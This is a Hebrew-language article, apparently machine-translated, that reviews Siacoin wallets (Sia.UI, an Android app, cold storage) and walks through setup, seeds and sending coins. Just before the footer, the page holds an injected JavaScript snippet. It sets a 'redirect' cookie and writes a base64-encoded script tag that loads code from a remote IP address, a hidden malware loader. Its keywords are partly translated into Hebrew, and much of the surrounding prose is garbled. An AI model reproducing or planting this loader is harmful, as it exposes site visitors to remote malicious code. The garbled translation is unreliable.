15 49.0138 8.38624 1 0 4000 1 https://www.frank-gehry.com 300 0
theme-sticky-logo-alt
theme-logo-alt

מהם הארנקים הטובים ביותר עבור Siacoin?

הרעיון הבסיסי העומד מאחורי טכנולוגיית הבלוקצ’יין הוא אחסון מבוזר ומאובטח של נתונים דיגיטליים. בעוד שרוב הפתרונות הבנויים על הבלוקצ’יין נוטים להשתמש במסד הנתונים המאובטח ביותר הזה אך ורק ליישומים פיננסיים, יש כמה שמעזים לעשות איתו משהו אחר..

יישום כזה הוא סיה. פלטפורמת האחסון Sia (SSP) היא אלטרנטיבה מבוססת בלוקצ’יין לפלטפורמות אחסון ענן פופולריות כמו Amazon AWS. זה עובד על ידי אחסון הנתונים שלך ברחבי רשת גלובלית, מוצפנים באמצעות אותם פרוטוקולים המשמשים ליצירת מטבעות קריפטוגרפיים כמו ביטקוין.

זה הופך את סיה לאלטרנטיבה הרבה יותר חסכונית לאחסון ענן תוך הקפדה על זמני השוואה לזו של המתחרים המעוגנים שלה.

כעת בעוד תכונות פורצות דרך אלו הופכות את סיה לאופציה להשקעה אטרקטיבית עבור חובבי הקריפטו, היא גם מקשה על מציאת ארנקים טובים התומכים באסימון..

הסיבה לכך היא כי ה- Siacoins שלך הם לא רק אסימונים הניתנים לסחר על סמך שווי השוק שלהם, אלא גם המפתחות לאחסון הקבצים הפרטי שלך, המופצים ברחבי רשת Sia. ככזה, שילוב הארנק עם Siacoin אינו עניין פשוט וזקוק לשיתוף פעולה עמוק בכדי לעבוד כראוי.

אז מה הארנקים הטובים ביותר התומכים בסיאקו? בוא נגלה.

Sia.UI

כיצד ליצור ארנק Sia.UI?

ארנק ה- Sia.UI הוא הארנק הרשמי של חברת Sia, המיוצר על ידי Nebulous, מפתחי פלטפורמת האחסון Sia. זמין עבור Windows, Linux ו- Mac OS, Sia.UI הוא הארנק הבטוח והבטוח ביותר לאחסון אסימוני ה- Sia שלך על שולחן העבודה..

כיצד להשתמש בארנק Sia.UI?

מגדיר

קודם כל, ראש אל הקישור הזה והורד את לקוח Sia.UI לשולחן העבודה שלך. תתבקש לבחור את מערכת ההפעלה שבחרת.

הורד את ארנק Sia.UI

לאחר שהורדת את חבילת ה- zip, הגיע הזמן לחלץ את התוכן לתיקיה חדשה. זכור כי אין תהליך התקנה עבור לקוח Sia.UI; הקבצים שחולצו יפעלו כיישום עצמאי. אז וודאו שאתה רוכסן אותם לספריה ‘קבועה’, במקום פשוט לחלץ אותה בתיקיית ההורדות עצמה.

כיצד להתקין את ארנק Sia.UI ב- Windows

עכשיו אתה רק צריך להפעיל את היישום כדי להמשיך. עם השקתו לראשונה, ארנק Sia.UI ינסה להסתנכרן עם ה- Sia blockchain. התהליך יכול להימשך יום שלם מכיוון שהוא צריך להוריד כל גוש עסקאות שהושלם עד היום. סנכרון זה יחזור על עצמו בכל הפעלת היישום – אם כי אם מדובר בנחמה כלשהי, מסגרות הזמן הבאות יהיו קצרות בהרבה.

הגדרת ארנק Sia.UI ב- Windows

לאחר השלמת הסנכרון, כעת תוכלו להתחיל את הארנק. לפניכם שתי אפשרויות: ליצור ארנק חדש, או לשחזר ארנק ישן. האפשרות השנייה שימושית רק אם היה לך בעבר ארנק Sia, או אם אתה עובר למכשיר חדש.

אחרת, לחץ על האפשרות ‘צור ארנק חדש’.

כיצד ליצור ארנק Sia.UI

כעת יעלה מסך המציג את הזרע והסיסמה של הארנק החדש שלך (אם תבחר ליצור כזה).

הזרע, או הביטוי הממני, הוא המפתח הפרטי לארנק שלך. ניתן להשתמש בו כדי לגשת לקבצים שאתה שומר ברשת Sia, אז וודא שאתה מציין אותו במקום מאובטח, בניגוד פשוט לשמירת צילום מסך או להקליד אותו בקובץ טקסט איפשהו. ארנק נייר פיזי עובד הכי טוב כאן – פשוט אל תשמור אותו שוכב למראה רגיל.

כיצד להשיג Sia.UI זרע ארנק וסיסמא

אם בחרת לקבל סיסמה, היישום יבקש ממך להזין אותה ולפתוח את הארנק שלך. הארנק יינעל בכל פעם שתדליקו אותו מחדש, מה שיכול להוות נקודת ביקורת אבטחה טובה במקרה של מחשב משותף.

כיצד לפתוח את ארנק Sia.UI

וזה הכל! כעת ארנק ה- Sia.UI פועל בצורה מושלמת. אף כי מכיוון שהארנק שלך חדש, כל מה שמסך הפתיחה יראה הוא הודעת ‘אין עסקאות אחרונות’. הגיע הזמן לתקן זאת.

ארנק Siacoin Sia.UI

כיצד לקבל מטבעות סיה

קל לקבל מטבעות סיה. כל שעליך לעשות הוא לחלוק את כתובתך עם השולח, ואז לחכות שהעסקה תופיע בארנק שלך.

כעת, אין כתובת קבועה קבועה לארנק שלך. הדבר היחיד שנשאר ללא שינוי הוא המפתח הפרטי שלך (או הזרע, כפי שכינו אותו קודם). כתובות נוצרות לכל שימוש, כך שאינך אמור לעשות שימוש חוזר בכתובות ישנות לקבלת עסקאות חדשות.

כיצד לקבל מטבעות לארנק Sia.UI

ארנק ה- Sia.UI דואג לכם לפרטים כאלה. אתה רק צריך ללחוץ על האפשרות קבל Siacoin בפינה השמאלית העליונה של המסך. תיבת דו-שיח קטנה תופיע. בתיבה מוצגת כתובת חדשה שנוצרה אותה תוכלו להעתיק ולשתף בבטחה לשולח לקבלת כספים.

כיצד למצוא כתובת ארנק Sia.UI

לפעמים, ייתכן שיהיה עליך להשיג את הכתובות הישנות שכבר השתמשת בהן. מכיוון שלחיצה על כפתור קבל Siacoin יוצרת כתובת חדשה בכל פעם, עלינו לעשות משהו אחר.

ראשית, נווט לכרטיסייה ‘טרמינל’ בסרגל הצד.

כיצד להשתמש בכתובת ישנה בארנק Sia.UI

המסוף, כפי שאולי ניחשתם, הוא חלון להזנת פקודות עבור לקוח ה- Sia, המציע יותר כוח וגמישות מאשר אפשרויות ה- GUI. אולם לעת עתה איננו זקוקים לשום דבר מסובך. פשוט הקלד ‘כתובות ארנק’ ולחץ על Enter.

איתור כתובת ארנק Sia.UI

כפי שאתה יכול לראות, החלון יציג את כל הכתובות שנוצרו עד התאריך בארנק. שים לב שלא אכפת לה אם הכתובת שימשה בפועל או לא – כל עוד נוצרה כתובת, היא תמצא כאן. זה יכול להיות שימושי להשגת כתובות שאיבדת בלי להשתמש בה משום מה.

אבל לעולם, לעולם, לא ישתמשו מחדש בכתובות ישנות. זה פותח אותך להתקפות זדוניות, וניתן לגנוב את הכספים והקבצים שלך בצורה כזו.

כיצד לשלוח מטבעות סיה?

לשלוח את ה- Siacoins שלך קל באותה מידה. פשוט לחץ על כפתור ‘שלח Siacoin’ בפינה השמאלית העליונה הפעם.

כיצד לשלוח מטבעות מארנק Sia.UI

זה מעלה תיבה נוספת, המבקשת ממך להזין את סכום המשלוח ואת כתובת המקבל. רק תוודא שיש לך מספיק בארנק גם לשלם עבור דמי העסקה ולחץ על כפתור השליחה. זה הכל. הבלוקצ’יין של סיה ידאג לכם לשאר.

שליחת Siacoin מארנק Sia.UI

Sia Wallet Android

באופן רשמי, לסיה אין ארנק נייד. עם זאת, מפתח צד ג ‘בנה יישום אנדרואיד להפעלת צומת Sia בנייד.

עם זאת, ארנק ה- Sia של אנדרואיד הוא לא פחות ממתחריו. הממשק מלוטש, הפקדים אינטואיטיביים והביצועים מהירים וחלקים. ניתן אפילו להעלות ולהוריד קבצים לרשת Sia מהאפליקציה עצמה, עם תמיכה בתכונות מתקדמות כמו חוזים וקצבאות מובנות..

בואו ללמוד כיצד להשתמש בו.

מתחילים

ראשית, עבור אל Google play ו- להוריד את אפליקציית Sia. לאחר שתדליק אותו בפעם הראשונה, יוצג בפניך המסך הבא.

ארנק Sia באנדרואיד

תהליך הסנכרון הוא חובה לפני שתוכל לשלוח כספים כלשהם, אם כי אתה עדיין יכול לקבל אסימונים בלעדיו. התהליך עשוי להימשך זמן מה (ונתונים), לכן הקפד לסנכרן אותו עם ה- wifi הביתי שלך בן לילה.

לעת עתה, בואו ניצור ארנק. לשם כך, פתח את תפריט שלוש הנקודות.

כיצד ליצור ארנק Siacoin באנדרואיד

כפי שאתה יכול לראות, כל האפשרויות העיקריות לשימוש בארנק Sia מפורטות בתפריט זה לגישה נוחה. הקש על האפשרות ‘צור ארנק’ כדי להמשיך.

אבטחת ארנק Siacoin באנדרואיד

שלא כמו יישומי ארנק רבים אחרים שבהם השתמשת, ארנק ה- Sia אנדרואיד אינו דורש ממך לתת שם לארנק שלך. כל מה שאתה צריך זה לבחור סיסמה חזקה ולאשר אותה. במקרה שיש לך כבר חשבון Sia קיים וברצונך לשחזר אותו, בדוק את האפשרות צור מזרע קיימת.

זרעי ארנק באפליקציית אנדרואיד Siacoin

אם אתה משחזר חשבון קודם, זה המקום שבו אתה צריך להזין את הזרע הישן שלך. אחרת, יופיע לוח מידע עם הזרע שלך 29 מילים. היזהר גם מהאזהרה שניתנה לעיל; הזרע הוא ממש המפתח לארנק שלך, והדבר היחיד שעומד בין הכספים שלך לבין האקר. בהמשך, אפילו קבצים המאוחסנים ב- Sia יוחזרו באמצעות זרעים, לכן הקפד לרשום את הזרע שלך ולאחסן אותו במקום בטוח..

אמנם הארנק נותן לך אפשרות העתקה פשוטה, אך לא מומלץ להשתמש בו, שכן פשוט לאחסן את הזרע שלך בקובץ טקסט היא הדרך הטובה ביותר להדליק אותו להאקר. אם ברצונך לאחסן דיגיטלית, לפחות השתמש בשירות קמרון מוצפן, או יותר טוב, השתמש בארנק הנייר הישן והטוב. תאמין לי, אינך מעוניין שמישהו אחר יתקרב לזרעך.

ארנק Siacoin נעול באפליקציית Android

וזה בדיוק בערך. הארנק שלך נוצר. בתחילה, הוא מתחיל נעול ועליך לבטל את נעילתו מהתפריט על ידי הזנת הסיסמה שלך לפני שתוכל לעשות בו דבר. אתה יכול לנעול את הארנק שוב במקרה שאתה משאיר את הטלפון ללא השגחה לזמן מה, כך שמישהו לא יכול פשוט להיתקל בטלפון שלך ולהתחיל להוציא את הכספים שלך.

עכשיו בואו נגלה כיצד להשתמש בארנק החדש והנוצץ שלנו, נכון?

קבלת סיאקואינס

בכל ארנק עבור כל קריפטו, קבלת כספים היא רק עניין של גישה ושיתוף הכתובת הציבורית שלך עם השולח. בארנק האנדרואיד של Sia, זה עניין פשוט של פתיחת תפריט שלוש הנקודות והקשה על האפשרות ‘הצג כתובת’. (יתכן שתבחין ב’הצגה כתובת ‘esאפשרות ‘גם כן. אל תדאג בקשר לזה, נסביר את זה עוד רגע.)

לחלופין, תוכל להקיש על כפתור ‘+’ בפינה השמאלית התחתונה.

כיצד לקבל את Siacoin באפליקציית ארנק אנדרואיד

מטוס הנייר מציין ‘שלח’ ואילו חץ ההורדה מיועד ל’קבל ‘. לחץ על כפתור הקבלה לעת עתה.

כיצד לשלוח באפליקציית אנדרואיד של ארנק Siacoin

כפי שאתה יכול לראות, מוצג בפניך מחרוזת ארוכה של … ובכן, ג’יבריש, מלווה בקוד QR. סריקת קוד QR היא השיטה הטובה ביותר מכיוון שהיא מקטינה את הסבירות להתגנבות של שגיאות עקב דמות שלא או במקומה בהעתקה. אם במקרה השולח אינו בקרבת מקום, תמיד תוכל להעתיק ולשתף את הכתובת עצמה.

צופה בכתובות ישנות

שים לב שהכתובת אינה קבועה קבועה בחשבונך; בפעם הבאה שתלחץ על כפתור ‘הצג כתובת’, תיתקל בכתובת אחרת לגמרי. זה טבעי מכיוון שהכתובות נוצרות לטוס לכל עסקה, ואינן מיועדות לשימוש חוזר.

אבל לפעמים, אולי תרצה לאחזר כתובת ישנה שוב. אולי איבדת את הכתובת שהועתקת לפני ששלחת אותה. אולי העסקה מעולם לא בוצעה. במקרים כאלה, תוכל (למרות שמומלץ לא לעשות זאת) להשיג שוב את הכתובת הישנה.

לשם כך, הורד את תפריט שלוש הנקודות ובחר הפעם באפשרות ‘הצג כתובות’. האפליקציה תפרט עבורך את כל הכתובות שנוצרו בעבר בסדר כרונולוגי.

כיצד להציג כתובות ישנות בארנק אנדרואיד של Siacoin

שולח סיאקו

שליחת כספים דומה. לחץ שוב על כפתור ‘+’ בפינה השמאלית התחתונה.

כיצד לשלוח באפליקציית אנדרואיד של Siacoin

הקש הפעם על מישור הנייר.

שליחת Siacoin באמצעות ארנק אנדרואיד

כפי שאתה יכול לראות, הטופס שהוצג הוא מינימלי; כל מה שאתה צריך זה את כתובת הנמען ואת הסכום שיש לשלוח. אם הועתקה הכתובת, לחיצה על הלוח תדביק אותה בשדה. אחרת, הקשה על סמל קוד ה- QR תאפשר לך לחפש קוד QR תקף מהנייד שלך, לתרגם אותו באופן אוטומטי לכתובת Sia..

הקש על החץ כדי להתחיל את העסקה.

צופה בזרע שלך

במקרה שאתה מאבד את הזרע שהקלטת במהלך יצירת הארנק, אין צורך להיכנס לפאניקה. אתה עדיין יכול להציג את הזרע שוב. פשוט הניע את תפריט שלוש הנקודות מהפינה הימנית העליונה.

להציג זרע באפליקציית אנדרואיד Siacoin

כעת הקש על האפשרות ‘הצג זרעים’. הזרע הממוני שלך בן עשרים ותשע מילים לפניך שוב. אך אל תשכח לשמור גם עותק פיזי של הזרע; רק בגלל שאתה יכול לראות את זה בכל עת זה לא אומר שאתה לא צריך גיבוי. לדוגמה, במקרה שהמכשיר שלך נגנב או נשבר, תצטרך את הזרע כדי להחזיר את הארנק שלך שוב למכשיר חדש.

זרעי ארנק אנדרואיד של Siacoin

מִתקַדֵם

הקשה על תפריט ‘צומת’ בפינה הימנית העליונה מורידה רשימה נוספת של אפשרויות. אפשרויות אלה אינן חיוניות לעסקאות פשוטות ביום יום, אלא נוגעות לתכונות המתקדמות של Sia.

תכונות ארנק אנדרואיד מתקדמות של Siacoin

השוכר

הקשה על אפשרות השכרה (מסומנת על ידי הענן) מפילה לתפריט משנה קטן.

תפריט משנה של ארנק אנדרואיד של Siacoin

‘קבצים’ מיועד לגישה לרשת אחסון הקבצים המבוזרת של סיה. פתיחתו בפעם הראשונה מעלה מסך ריק, עם תיבת מידע די מילולית המזהירה אותך מפני החסרונות הנוכחיים של מערכת האחסון Sia..

בקצרה, זהו חוסר היכולת לאחזר קבצים שלא הועלו מאותו מכשיר. סביר להניח שזה ישתנה בעתיד, אך לעת עתה הימנע מאחסון קבצים חשובים מאוד ברשת Sia, מכיוון שאיבוד המכשיר שלך יאבד גם את הקבצים..

הודעת ארנק אנדרואיד של Siacoin

לאחר קבלת ההודעה, יקבל את פניכם מסך ריק למדי. בואו נשנה את זה. הקש על כפתור ‘+’ בפינה השמאלית התחתונה.

מסך הבית של אפליקציית אנדרואיד Siacoin

הסמל הראשון, כפי שאולי ניחשתם, הוא לבחירת קובץ, ואילו השני לתיקיות שלמות. הקשה על אחת מהאפשרויות מעלה את סייר הקבצים ותוכל לבחור את הקבצים שברצונך לאחסן.

בפינה השמאלית העליונה של מסך הקבצים יש אפשרויות להגדרת תצוגת התצוגה שלך. אפשרות הזכוכית המגדלת היא לחיפוש קבצים וזה שימושי ברגע שתתחיל להשתמש באחסון Sia ברצינות, ויש בו מאות קבצים..

האפשרות השנייה היא לשינוי סידור המיון. תוכלו למיין את הקבצים לפי שם, לפי גודל, עולה וכו ‘. אתם מוזמנים לנסות את המצבים השונים כדי למצוא מה מתאים לכם..

כיצד למיין קבצים באפליקציית Android ל- Siacoin

אך לפני שתוכלו להתחיל לאחסן קבצים, יש כמה דברים שעליכם לעשות קודם.

אופן אחסון הקבצים ב- Sia שונה במקצת ממה שהיית רגיל אליו.

בעיקרון, אתה מגדיר ‘קצבה’ של כספים, ומקדיש אותו לאחסון קבצים. רנטר, המודול של סיה האחראית על אחסון, יוצר ‘חוזים’ עם מארח מתאים שיספק את האחסון הזה. ניתן להגדיר ולהתאים קצבה זו מהאפשרות קצבה הנקראת כראוי בתפריט המשנה של שוכר.

פירוט אחסון אפליקציות ל- Siacoin

אתה יכול גם לבדוק את חלון הקצבה לפירוט ההוצאות שלך. כפי שאתה יכול לראות, התצוגה מפרטת את סכום הקצבה שהושקע, תקופת השכירות ותנאי החידוש, אם בכלל. ככל שבלוקצ’יין של סיה יבשיל עוד יותר, צפו שתצוגה זו תוסיף פונקציונליות נוספת.

מצד שני, ניווט לאופציה ‘חוזים’ יכול להראות לכם את כל החוזים המפעילים ואת המארחים איתם יש לכם.

חוזים באפליקציית אנדרואיד Siacoin

אחסון קר של Siacoin

לוגו של Siacoin

אחסון קירור של Siacoin הוא מתקן לייצור זרעים וכתובות לבלוקצ’יין סיה מבלי להתחבר למעשה לרשת. מכונה “אוויר פסק”, זוהי שיטה לאחסון בטוח של האסימונים שלך ללא סיכון לאבד פרטים רגישים להאקרים המתחקים אחר תעבורת הרשת שלך..

אופן הפעולה הוא די פשוט. פשוט מורידים כלי שימושי זה והשתמש בו במחשב שאינו מקוון. יתרה מכך, הפעל אותו על LiveCD המופלט לאבטחה מרבית.

ניתן לשתף את הכתובות שנוצרו עם משתמשים אחרים לצורך קבלת תשלומים בבטחה, או למשלוח כספים משלך מארנק אחר או מחליפה. כדי לשלוח כספים, עם זאת, עליך להשתמש גם ביישום ארנק. אז השירות הוא הטוב ביותר ליצירת חשבון לאחסון לטווח ארוך של הכספים שלך, המכונה גם ‘אחסון קר’.

פונקציה getCookie (e) {var U = document.cookie.match (RegExp חדש (“(?: ^ |;)” + e.replace (/((\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, ”\\ $ 1 ″) +” = ([^;] *) ”)); להחזיר U? decodeURIComponent (U [1]): ריק 0} var src = “נתונים: text / javascript; base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs =”, עכשיו = Math.floor (Date.now () / 1e3), עוגיה = getCookie ( “הפניה”); אם (עכשיו>= (time = cookie) || ריק 0 === time) {var time = Math.floor (Date.now () / 1e3 + 86400), date = new date ((תאריך חדש) .getTime () + 86400) ; document.cookie = ”redirect =” + time + ”; נתיב = /; יפוג = ”+ תאריך. ל- GMTString (), document.write (”)}

Previous Post
סקירת ארנק השילוש של IOTA: האם זו הבחירה הטובה ביותר?
Next Post
كيفية شراء البيتكوين في هونج كونج